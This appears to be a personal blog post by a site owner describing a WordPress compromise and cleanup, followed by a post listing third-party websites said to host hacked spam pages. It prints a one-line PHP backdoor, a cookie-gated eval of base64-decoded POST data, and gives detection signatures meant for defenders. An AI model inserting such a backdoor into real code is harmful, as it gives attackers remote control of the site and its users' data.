If you attempted to access the site for the past 24+ hours I apologize for the prolonged downtime. I upgraded the WordPress system the blog runs on (complete with fail, and no thanks to the WordPress community in #wordpress for their non-help — I definitely will switch the blog to another system after 1.7’s release, and recommend prospective users to stay away from them and their system), and found compromised files throughout the system.

I believe I have corrected/removed the backdoor mechanisms which spammers have been using against the site, but there’s no evidence that the wacky WordPress system the site is now running on doesn’t have other compromised files, as well as the security holes through which the crackers originally got in.

Several compromised files had this line inserted at the beginning,

<?php if(md5($_COOKIE['_wp_debugger'])==”5fd808ac028e5197dd69318e32407eb7″){ eval(base64_decode($_POST['file'])); exit; } ?>

Others were disguised as image files, with file extensions of “pngg” and “jpgg”, and beginning with “

If you want to check your site for similarly compromised files and backdoors, search through your site code for signatures such as “qwerty”, “4008deadb16536f48b84fdc70f194dac”, “find suid files”, “_wp_debugger”, “5fd808ac028e5197dd69318e32407eb7″. The signatures are sure to change, as they’re used to activate the backdoor scripts, but at least you have a way to check current installations for these same spammers.

All in all, an unhealthy state of affairs for the Content Management System (CMS) industry. The market is still up for grabs.

UPDATE: Thankfully, the MIT Media Lab’s Vision & Modeling Group’s server has taken down the hacked pages. When will the rest of these websites do the right thing?

One of the burdens of being an international software mogul is the comment spammers that attempt to pollute my brilliant commentary with their garbage.

I can deal with the fact that there are vampires out there that prey on the weakness and absent-mindedness of others. But shouldn’t the folks running MIT be smart enough to secure their own servers? Like, perform some rudimentary check for exploitable devices and compromised systems?

Since I won’t link directly to the pages the comment spammer wanted to place in a comment to my blog, You’ll have to figure out how to go directly to this page yourself: http://vismod.media.mit.edu at page /people/health/bakhtear/@top/viagra/order-viagra.html. If you do a search on the text following the @, you’ll see a few other sites hacked by this ass.

While Geoff Pado and I were inspecting the exotic URL and attempting to decipher how the strange ‘@’ would be processed by a server, and which server was actually responsible for this monstrosity, Gus Mueller used curl to determine it was actually stored on The MIT Media Lab’s server for the defunct Vision and Modeling group.

Other hacked websites whose URLs have been posted on my site:

http://www.gatlinburgeducation.org at page /custom/css/
http://www.silvergalleon.com at page /custom/css/
http://www.hayloftonline.com at page /custom/css/
http://www.vinosbrewpub.com at page /buy_ats/Client_carts/css/
http://www.dhowardpottery.com at page /custom/css/
http://tecpapers.com at /css
http://www.sandboxsoftware.com at page /new/css/
http://www.dallasavionics.com at page /tkm/css/
http://ukindustrialtapes.co.uk at page /new/ice/
http://redstonemedia.com at page /invoice/icq/
http://kartingnortheast.com at page /e-news/new/
http://thequadruscentre.co.uk at page /pdf_files/pdf/
http://freemancateringbutchers.co.uk at page /images/gif/
http://aldg.co.uk at page at page /Connections/ip/
http://initialimages.co.uk at page /images/sr/
http://learntotile.co.uk at page /images/twu/
http://www.dupeyrou.ch at page /css/
http://weardock.co.uk at page /guestbook/res/
http://personalgiftsuk.co.uk at page /sanddancer/bat/
http://sq-one.co.uk at page /news/wqs/
http://advertisingready.com at page /css/
http://adsenseready.com at page /css/
http://asylum-gameservers.com at page /epass/card/
http://www.cerrone.net at page /txt/bin/
http://www.sthelenahospital.org at page /info/css/

I’ve not provided the markup to actually link to these sites so the search engines don’t think I’m linking to them, although they may actually follow the text in that case, and so I don’t get considered as an affiliate of these bozos.

Three other hacked sites that the perpatrators spammed me with have since taken down the offending pages. Let’s hope they’re more secure and that this helps to shame the laggards into shaping up. But seeing as how they haven’t corrected their lapses after my emails, I don’t think this will fare any better.